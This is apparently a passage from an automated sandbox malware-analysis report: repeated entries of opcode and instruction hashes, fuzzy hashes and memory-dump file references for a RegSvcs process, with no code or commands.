                                                                                            • Opcode ID: f7bb0c69882a5c0fbaa7125f5dbdd20505f7295ad6b42905f8665785a4172636
                                                                                            • Instruction ID: e17917e722de02ca153cdbba4c8add4447c6fb5300410f0c76e2bbceeaef2709
                                                                                            • Opcode Fuzzy Hash: f7bb0c69882a5c0fbaa7125f5dbdd20505f7295ad6b42905f8665785a4172636
                                                                                            • Instruction Fuzzy Hash: C071CEB19047049FCB20EF14C885F9B7BA9AF84760F14446AF9488B286D738D588FBD2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5243efbc066a5417002a96220e1559988f68c2578b92b197e6b18769cc2d25a8
                                                                                            • Instruction ID: ada496889153ce20f7f17f86d53498e8db38034d003d48e0a1477cd2b285978e
                                                                                            • Opcode Fuzzy Hash: 5243efbc066a5417002a96220e1559988f68c2578b92b197e6b18769cc2d25a8
                                                                                            • Instruction Fuzzy Hash: 8751C170900705DFD721DF9AC880AABFBF8BF94710F10861FE296976A5CBB4A645CB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e6fb17895732609d819e72153c0b44ca7e97d3e41738baec1344ee1af2b8d858
                                                                                            • Instruction ID: 95397d9792b24db12f80f997472997cea0cab81a0c62107ebacd1d9a5dde9af5
                                                                                            • Opcode Fuzzy Hash: e6fb17895732609d819e72153c0b44ca7e97d3e41738baec1344ee1af2b8d858
                                                                                            • Instruction Fuzzy Hash: 9B514AB1A00A45DFCB21EF65D981EAAB3F9FF09794F500429E54197261D738EE40EB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed51584d55bd98cf655ae9a63773f62b99e94eb3dadb5039d3e7bd883f68f519
                                                                                            • Instruction ID: bcbf505dfe7bb2dd096f3f8ef110fd4318c178522f38f07c5a76187d4b3d979e
                                                                                            • Opcode Fuzzy Hash: ed51584d55bd98cf655ae9a63773f62b99e94eb3dadb5039d3e7bd883f68f519
                                                                                            • Instruction Fuzzy Hash: 955157B16083019FD754DF29C881AABBBE5BFC8714F44892DF589C7264EB38DA05CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                            • Instruction ID: e44cdcf19d0ef0382ef9bd56de3bb5ca4ac8faded371b6d40aaccbfd46f96dde
                                                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                            • Instruction Fuzzy Hash: C351AD71E0021EABEF15DF94C841FEEBBB6AF45710F05406AE900AB240D734EE45DBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                            • Instruction ID: 1b14c9ec3f86789d78714512dbea72bf6c32fbbeca35a297cd3c5ab1294df48d
                                                                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                            • Instruction Fuzzy Hash: 7F51C432D0021DEFDF219E90CC81BBEB775AF40724F254665EB12672B1D7749E40AB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2ee4ed937ca29d41b5e9e6a25ad246edd4a882bebb87fe29e31670e6949dfa8a
                                                                                            • Instruction ID: b71d5c7babe7a42c0d9c2a3983f0d8f7dfe9c21f1e58026e7928e7b04146c58d
                                                                                            • Opcode Fuzzy Hash: 2ee4ed937ca29d41b5e9e6a25ad246edd4a882bebb87fe29e31670e6949dfa8a
                                                                                            • Instruction Fuzzy Hash: 9F519072D002299BDF10DF99D880AEEBBB4BF04B10F05416AFA55FB265D77C9901CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e8ee446b1013331faf92a95840465453371dc3641018faaba26ec6d5a7b3fdb
                                                                                            • Instruction ID: f498e7b1536e3f8c924ad4162ae46b83e892e4052f2cbabc676f7481d2d8e419
                                                                                            • Opcode Fuzzy Hash: 3e8ee446b1013331faf92a95840465453371dc3641018faaba26ec6d5a7b3fdb
                                                                                            • Instruction Fuzzy Hash: E241D1707056069BDA69DB2DC894B7BBBDEEFD0220F18C39AF9D587281DB34D901C690
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 87340800007112036a740971f45ea189d7afece99369c276f5d6e6437ae9c56d
                                                                                            • Instruction ID: dbf496ed565ff6bdcb8c2c5ff66d7f19be5648c74e8913bb0566e373a26e585b
                                                                                            • Opcode Fuzzy Hash: 87340800007112036a740971f45ea189d7afece99369c276f5d6e6437ae9c56d
                                                                                            • Instruction Fuzzy Hash: AA4192729083129BD710FB75CC41BAFB7D8AF88B14F440929F9A4E7180E678D904A797
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 842f617e47e800bf49b8121f192618748c81f0c134132832e08e6780f5339e6c
                                                                                            • Instruction ID: 7f4d9ca66ebc9c0ec74bc5059d20d64d54768264e5281e2b59497965d3c9a915
                                                                                            • Opcode Fuzzy Hash: 842f617e47e800bf49b8121f192618748c81f0c134132832e08e6780f5339e6c
                                                                                            • Instruction Fuzzy Hash: 4251AE72D0022DDFCB20DFA9CA809AEB7B9FF48324B118529E655A7311D735AD01DBD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                            • Instruction ID: 15214970d30a382ba5fb9634a0af7db741486ee41eb6a8405b6cf11bdd6d9427
                                                                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                            • Instruction Fuzzy Hash: 4441B432704A169FDB29DE58C980A6AB7EDFBC4210B05466EE9D287641EB34ED05C790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb83bbebbc500af5173f01e731d465b3a86dddca3970dcd72e33b27e6231fccd
                                                                                            • Instruction ID: da8168379567807bb0953619e6c6a8de24332fd94e139fbc22f583799e33d94e
                                                                                            • Opcode Fuzzy Hash: bb83bbebbc500af5173f01e731d465b3a86dddca3970dcd72e33b27e6231fccd
                                                                                            • Instruction Fuzzy Hash: 31419CB6D002199BCF14DF98D840BEEB7B4BF4A710F14816AE815E7250DB359D41EBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction ID: 83441fad8301e558cb8b4c71d70764f5db6c21330c5d772e4811eb36dc9872a8
• Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
• Instruction Fuzzy Hash: 814138B1A00605EFCB24CF99D980AAAB7F4FF09710B20496DE556D7291DB30FA44EF94
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13b0a32d091f97a116ddbbb1ce93ef429a07876f601c5e13c22d12594a397701
• Instruction ID: 2d4ad65f8419ea6a42ba1bffb8d40d707267eda6ad7757e49c2dbf3e78ce7374
• Opcode Fuzzy Hash: 13b0a32d091f97a116ddbbb1ce93ef429a07876f601c5e13c22d12594a397701
• Instruction Fuzzy Hash: 9241BD31A04649CBDB51DF59C840B6E77B5EF94710F2980A7E808DB3A1E376D900EB82
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5c9f7c215ab895139599f7e4fcb604c5190ff43410204b85942cf6d0d2bf03e0
• Instruction ID: ae7d7d9445dce7f1309c62fa4a859182cd6c02fd02d4891f4f6c63099586c6b3
• Opcode Fuzzy Hash: 5c9f7c215ab895139599f7e4fcb604c5190ff43410204b85942cf6d0d2bf03e0
• Instruction Fuzzy Hash: B3318DB2A01349DFDB51DF58C541799BBF0FB09724F2081AEE019DB251D7369902DF90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c7d41e75cefc9fdfb382df03cfb5f3d13421cc93f63ef734b26b6b61d78125b0
• Instruction ID: df40db4de9693de80cc164cdd805ab499a494f20a49e77e4234c1dfb647c6171
• Opcode Fuzzy Hash: c7d41e75cefc9fdfb382df03cfb5f3d13421cc93f63ef734b26b6b61d78125b0
• Instruction Fuzzy Hash: 8841C372E056159FCB10DF18CD41AA8B7B1BF457A0F24872EE815A7281DF34ED43AB90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e96da3bc0c321958b14c5c7899de14ca136e4c7385b76d84f90db98b19598d4
• Instruction ID: f815b20a20ffa65d000811b8aaa3eb14d6319398320f8526da51707406757fc6
• Opcode Fuzzy Hash: 3e96da3bc0c321958b14c5c7899de14ca136e4c7385b76d84f90db98b19598d4
• Instruction Fuzzy Hash: E141C272A046459FC320EF68C841ABAB7E5AFC8710F040629F994D76A2EB34ED14D7A5
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: adf3d785aba6c29f088d97cf3e0587e2f20aaaa7eaeb1ce585a784bf2ee120cb
• Instruction ID: 57ea711caae04f87dde4bbb9011aab141052f9a40ac01c2e0c883e5990b23ad2
• Opcode Fuzzy Hash: adf3d785aba6c29f088d97cf3e0587e2f20aaaa7eaeb1ce585a784bf2ee120cb
• Instruction Fuzzy Hash: E9312472F00364B7E7209E9A8C86F6A7668DF56B51F150069FB04A7281E274DF00F3A2
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction ID: fe8ba300f4cd3497945faefcd38bccbfb5515fc4cd33b6bc09691d60518f30c5
• Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction Fuzzy Hash: 70314A32A01244AFDB519B68CC40BDEBBE9EF04350F0481B6F455D7352C678D848EBA5
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb6ceb906efce772a88cd0181659beb9f6762c3f7119aaa6cf43ada3745406fe
• Instruction ID: 2c9a807b15bc5801042d076626a1dbb33fa4a8dce938fc5d586f6cf4a53c049f
• Opcode Fuzzy Hash: eb6ceb906efce772a88cd0181659beb9f6762c3f7119aaa6cf43ada3745406fe
• Instruction Fuzzy Hash: 1331C875780705ABE723AF55CC41FAF7AA4AB49B50F100028FA00AB292CEADDD00D7A0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1cd294e2d00812bdfc108a1ff53613b820b5b943f988021d7b41aab91463bb57
• Instruction ID: 23182b982c9e4885f57f5c370517f8a668b3a09578551d588837c62fad217805
• Opcode Fuzzy Hash: 1cd294e2d00812bdfc108a1ff53613b820b5b943f988021d7b41aab91463bb57
• Instruction Fuzzy Hash: DB31F4726056208FC362DF1DD880E6AB7E5FB80360F1A44ADF9D5DB665D732E800CB90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
• Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmp
